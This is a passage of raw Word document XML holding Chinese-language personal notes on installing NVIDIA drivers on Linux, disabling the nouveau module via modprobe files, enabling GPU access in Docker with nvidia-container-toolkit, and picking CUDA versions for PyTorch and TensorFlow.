                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0187DD71" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的下载链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5446ED79" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00566588">
        <w:t>https://www.nvidia.com/content/DriverDownloads/confirmation.php?url=/XFree86/Linux-x86_64/525.89.02/NVIDIA-Linux-x86_64-525.89.02.run&amp;lang=us&amp;type=TITAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4011285B" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D45F17D" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装显卡后查询：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00697BBF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E3EB9" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常能识别出显卡，则认为驱动安装上去了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C911DA" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53282F3C" w14:textId="6E67E7C0" w:rsidR="00280170" w:rsidRDefault="00280170" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nvidia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认可以被你选择去禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>ouveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF5010D" w14:textId="77777777" w:rsidR="00636C2C" w:rsidRDefault="00636C2C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA0799A" w14:textId="32335BA9" w:rsidR="00636C2C" w:rsidRPr="00636C2C" w:rsidRDefault="00636C2C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636C2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对我的机器有</w:t>
      </w:r>
      <w:r w:rsidRPr="00636C2C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用的是</w:t>
      </w:r>
      <w:hyperlink r:id="rId269" w:history="1">
        <w:r w:rsidRPr="00636C2C">
          <w:rPr>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/xian0710830114/article/details/124094603</w:t>
        </w:r>
        <w:r w:rsidRPr="00636C2C">
          <w:rPr>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>这个链接，</w:t>
        </w:r>
        <w:r w:rsidRPr="00636C2C">
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>修改</w:t>
        </w:r>
        <w:r w:rsidRPr="00636C2C">
          <w:rPr>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>/etc/modprobe.d/blacklist-nouveau.conf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00636C2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>才最终生效的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B52480" w14:textId="77777777" w:rsidR="00636C2C" w:rsidRDefault="00636C2C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C586C2" w14:textId="77777777" w:rsidR="00636C2C" w:rsidRPr="00636C2C" w:rsidRDefault="00636C2C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C41D82" w14:textId="07ECE7AD" w:rsidR="006F72DA" w:rsidRDefault="000C7F49" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF6247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>提示如下，可以从标黄的部分看到</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>卡官方驱动说是如何给</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6247">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>odprobe</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>添加禁用文件的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07453354" w14:textId="77777777" w:rsidR="00DF6247" w:rsidRDefault="00DF6247" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F1D0BB" w14:textId="77777777" w:rsidR="006F72DA" w:rsidRDefault="006F72DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>One or more modprobe configuration files to disable Nouveau have been written.  For some distributions, this may be sufficient to disable Nouveau; other distributions may require modification of the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE160DD" w14:textId="77777777" w:rsidR="006F72DA" w:rsidRDefault="006F72DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  initial ramdisk.  Please reboot your system and attempt NVIDIA driver installation again.  Note if you later wish to re-enable Nouveau, you will need to delete these files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C28C8D2" w14:textId="644DE157" w:rsidR="006F72DA" w:rsidRDefault="006F72DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6247">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/usr/lib/modprobe.d/nvidia-installer-disable-nouveau.conf, /etc/modprobe.d/nvidia-installer-disable-nouveau.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B5450" w14:textId="77777777" w:rsidR="006F72DA" w:rsidRDefault="006F72DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0004CCE3" w14:textId="77777777" w:rsidR="00590E83" w:rsidRDefault="00590E83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E180630" w14:textId="77777777" w:rsidR="00590E83" w:rsidRDefault="00590E83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52774886" w14:textId="67902D64" w:rsidR="00590E83" w:rsidRPr="006F72DA" w:rsidRDefault="00590E83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F155BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这两个文件内容如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F155BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351ECDD2" w14:textId="77777777" w:rsidR="00280170" w:rsidRDefault="00280170" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8B9519" w14:textId="77777777" w:rsidR="00A74FAB" w:rsidRDefault="00A74FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74FAB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/usr/lib/modprobe.d/nvidia-installer-disable-nouveau.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E3DA4A" w14:textId="77777777" w:rsidR="00A74FAB" w:rsidRPr="00A74FAB" w:rsidRDefault="00A74FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74FAB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># generated by nvidia-installer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A2C9C" w14:textId="77777777" w:rsidR="00A74FAB" w:rsidRPr="00A74FAB" w:rsidRDefault="00A74FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74FAB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>blacklist nouveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13195F05" w14:textId="61CE53CE" w:rsidR="00F155BB" w:rsidRDefault="00A74FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A74FAB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>options nouveau modeset=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0788FF07" w14:textId="624EA1B3" w:rsidR="00F155BB" w:rsidRDefault="00F155BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A44C09" w14:textId="77777777" w:rsidR="00932C13" w:rsidRDefault="00932C13" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r w:rsidRPr="0026475E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/modprobe.d/nvidia-installer-disable-nouveau.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05E43D" w14:textId="77777777" w:rsidR="00932C13" w:rsidRPr="0026475E" w:rsidRDefault="00932C13" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026475E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># generated by nvidia-installer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1011D274" w14:textId="77777777" w:rsidR="00932C13" w:rsidRPr="0026475E" w:rsidRDefault="00932C13" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026475E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>blacklist nouveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D58E85" w14:textId="16C35AE6" w:rsidR="00A74FAB" w:rsidRDefault="00932C13" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0026475E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>options nouveau modeset=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4060CFFE" w14:textId="77777777" w:rsidR="00932C13" w:rsidRDefault="00932C13" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00839A53" w14:textId="77777777" w:rsidR="00932C13" w:rsidRDefault="00932C13" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7960E2" w14:textId="77777777" w:rsidR="00A74FAB" w:rsidRDefault="00A74FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BEBF73" w14:textId="6FF027CE" w:rsidR="00E233EB" w:rsidRDefault="00092037" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="794" w:name="_Toc159780215"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="794"/>
    </w:p>
    <w:p w14:paraId="4A769C1B" w14:textId="77777777" w:rsidR="00092037" w:rsidRDefault="00092037" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F96B6F2" w14:textId="07977259" w:rsidR="00092037" w:rsidRDefault="00570BBB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00570BBB">
        <w:t>https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/nvidia-docker.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B1ADF6" w14:textId="77777777" w:rsidR="00092037" w:rsidRDefault="00092037" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19889DB4" w14:textId="04044406" w:rsidR="00570BBB" w:rsidRDefault="00570BBB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先说我个人的问题，</w:t>
      </w:r>
      <w:r w:rsidR="00270C1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于我换源了，然后换的</w:t>
      </w:r>
      <w:r w:rsidR="00270C1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tuna</w:t>
      </w:r>
      <w:r w:rsidR="00270C1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源里面，</w:t>
      </w:r>
      <w:r w:rsidR="00270C1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:r w:rsidR="00270C1D">
        <w:t>b-src</w:t>
      </w:r>
      <w:r w:rsidR="00270C1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认是被注释的，这部分是源的源代码一包，取消注释后，才能安装</w:t>
      </w:r>
      <w:r w:rsidR="00270C1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00270C1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡的开发者套件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA12A8" w14:textId="77777777" w:rsidR="00270C1D" w:rsidRDefault="00270C1D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026C37CB" w14:textId="0828CDC1" w:rsidR="00270C1D" w:rsidRDefault="00E94CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E94CFC">
        <w:t>sudo apt-get install -y nvidia-container-toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3DF263" w14:textId="044D7DF9" w:rsidR="00570BBB" w:rsidRDefault="00E94CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E94CFC">
        <w:t>sudo nvidia-ctk runtime configure --runtime=docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A1E7EE" w14:textId="14CF6823" w:rsidR="00570BBB" w:rsidRDefault="00E94CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E94CFC">
        <w:t>sudo systemctl restart docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38278111" w14:textId="0460F87F" w:rsidR="00570BBB" w:rsidRPr="00570BBB" w:rsidRDefault="00E94CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E94CFC">
        <w:t>sudo docker run --rm --runtime=nvidia --gpus all nvidia/cuda:11.6.2-base-ubuntu20.04 nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3A1F67" w14:textId="77777777" w:rsidR="00092037" w:rsidRDefault="00092037" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39912C41" w14:textId="77777777" w:rsidR="00E94CFC" w:rsidRDefault="00E94CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DCDA1FF" w14:textId="77777777" w:rsidR="00E94CFC" w:rsidRDefault="00E94CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4972CF94" w14:textId="77777777" w:rsidR="00E94CFC" w:rsidRDefault="00E94CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C84A87" w14:textId="77777777" w:rsidR="00E94CFC" w:rsidRDefault="00E94CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A5A31F" w14:textId="77777777" w:rsidR="00092037" w:rsidRDefault="00092037" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC35DCA" w14:textId="4E673BED" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="795" w:name="_Toc159780216"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CUDA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="795"/>
    </w:p>
    <w:p w14:paraId="6972D088" w14:textId="099FCCE0" w:rsidR="00D1315C" w:rsidRDefault="00D1315C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后总结，我</w:t>
      </w:r>
      <w:r w:rsidR="00FC73A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终运行起</w:t>
      </w:r>
      <w:r w:rsidR="00FC73A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ai</w:t>
      </w:r>
      <w:r w:rsidR="00FC73A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>uda11.7</w:t>
      </w:r>
      <w:r w:rsidR="002817DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="002817DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>torch</w:t>
      </w:r>
      <w:r w:rsidR="002817DD">
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidR="002817DD" w:rsidRPr="002817DD">
        <w:t xml:space="preserve"> 1.13.1</w:t>
      </w:r>
      <w:r w:rsidR="002817DD">
        <w:t>, tensor==</w:t>
      </w:r>
      <w:r w:rsidR="002817DD" w:rsidRPr="002817DD">
        <w:t xml:space="preserve"> 2.9.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530B0A2C" w14:textId="618CFC4A" w:rsidR="00D1315C" w:rsidRDefault="00D1315C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下是安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cuda</w:t>
      </w:r>
      <w:r>
        <w:t>11.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的过程，不如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能同时支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tensorflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>torch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26888011" w14:textId="77777777" w:rsidR="00D1315C" w:rsidRPr="00D1315C" w:rsidRDefault="00D1315C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F2055E" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC4D213" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cuda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nvidia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动版本对照：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBBDE2D" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B50AD">
        <w:t>https://docs.nvidia.com/cuda/cuda-toolkit-release-notes/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E470B76" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268F80AA" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pytorch</w:t>
      </w:r>
      <w:r>
        <w:t>,tensorRT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cuda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对照表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A47C895" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC308A">
        <w:t>https://docs.nvidia.com/deeplearning/frameworks/pytorch-release-notes/rel_21-02.html#rel_21-02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE6D943" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
